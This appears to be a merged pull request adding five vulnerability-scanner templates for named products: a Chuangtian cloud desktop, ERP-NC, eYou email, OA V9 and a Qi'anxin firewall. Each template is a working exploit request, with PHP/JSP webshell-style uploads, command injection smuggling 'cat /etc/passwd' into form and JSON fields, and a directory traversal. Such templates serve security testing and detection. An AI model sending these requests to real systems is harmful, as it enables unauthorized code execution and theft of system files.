Merge pull request #1272 from pikpikcu/patch-143

Add POC

vulnerabilities/other/core-chuangtian-cloud-rce.yaml

@@ -0,0 +1,42 @@
+id: core-chuangtian-cloud-rce
+
+info:
+  name: Core Chuangtian Cloud Desktop System RCE
+  author: pikpikcu
+  severity: critical
+  reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
+  tags: rce
+
+requests:
+  - raw:
+      - |
+        POST /Upload/upload_file.php?l=test HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
+        Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
+        Accept-Encoding: gzip, deflate
+        Accept-Language: zh-CN,zh;q=0.9,fil;q=0.8
+        Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6
+        Connection: close
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv
+        Content-Length: 183
+
+        ------WebKitFormBoundaryfcKRltGv
+        Content-Disposition: form-data; name="file"; filename="test.php"
+        Content-Type: image/avif
+
+        <?php phpinfo(); ?>
+        ------WebKitFormBoundaryfcKRltGv--
+
+      - |
+        GET /Upload/test/test.php HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
+
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body_2, "PHP Version")'
+          - 'status_code_2 == 200'
+        condition: and

vulnerabilities/other/erp-nc-directory-traversal.yaml

@@ -0,0 +1,27 @@
+id: erp-nc-directory-traversal
+
+info:
+  name: ERP-NC directory traversal
+  author: pikpikcu
+  severity: high
+  reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
+  tags: lfi,erp-nc
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename="
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Client"
+          - "ncwslogin.jsp"
+          - "admin.jsp"
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200

vulnerabilities/other/eyou-email-rce.yaml

@@ -0,0 +1,32 @@
+id: eyou-email-rce
+
+info:
+  name: eYou E-Mail system RCE
+  author: pikpikcu
+  severity: critical
+  reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
+  tags: rce,eyou
+
+requests:
+  - raw:
+      - |
+        POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chro·me/89.0.4389.114 Safari/537.36
+        Content-Length: 25
+        Cache-Control: max-age=0
+        Upgrade-Insecure-Requests: 1
+        Content-Type: application/x-www-form-urlencoded
+
+        type='|cat /etc/passwd||'
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+        part: body
+
+      - type: status
+        status:
+          - 200

vulnerabilities/other/oa-v9-uploads-file.yaml

@@ -0,0 +1,41 @@
+id: oa-v9-uploads-file
+
+info:
+  name: OA V9 Uploads File
+  author: pikpikcu
+  severity: high
+  reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
+  tags: rce,jsp
+
+requests:
+  - raw:
+      - |
+        POST /page/exportImport/uploadOperation.jsp HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
+        Content-Length: 216
+        Cache-Control: max-age=0
+        Upgrade-Insecure-Requests: 1
+        Origin: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFy3iNVBftjP6IOwo
+        Connection: close
+
+        ------WebKitFormBoundaryFy3iNVBftjP6IOwo
+        Content-Disposition: form-data; name="file"; filename="poc.jsp"
+        Content-Type: application/octet-stream
+
+        <%out.print(2be8e556fee1a876f10fa086979b8c7c);%>
+        ------WebKitFormBoundaryFy3iNVBftjP6IOwo--
+
+      - |
+        GET /page/exportImport/fileTransfer/poc.jsp HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
+
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body_2, "2be8e556fee1a876f10fa086979b8c7c")'
+          - 'status_code_2 == 200'
+        condition: and

vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml

@@ -0,0 +1,33 @@
+id: qi-anxin-netkang-next-generation-firewall-rce
+
+info:
+  name: Qi'anxin Netkang Next Generation Firewall RCE
+  author: pikpikcu
+  severity: critical
+  reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
+  tags: rce
+
+requests:
+  - raw:
+      - |
+        POST /directdata/direct/router HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
+        Content-Length: 178
+
+        {"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/poc.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
+      - |
+        GET /poc.txt HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+        part: body
+
+      - type: status
+        status:
+          - 200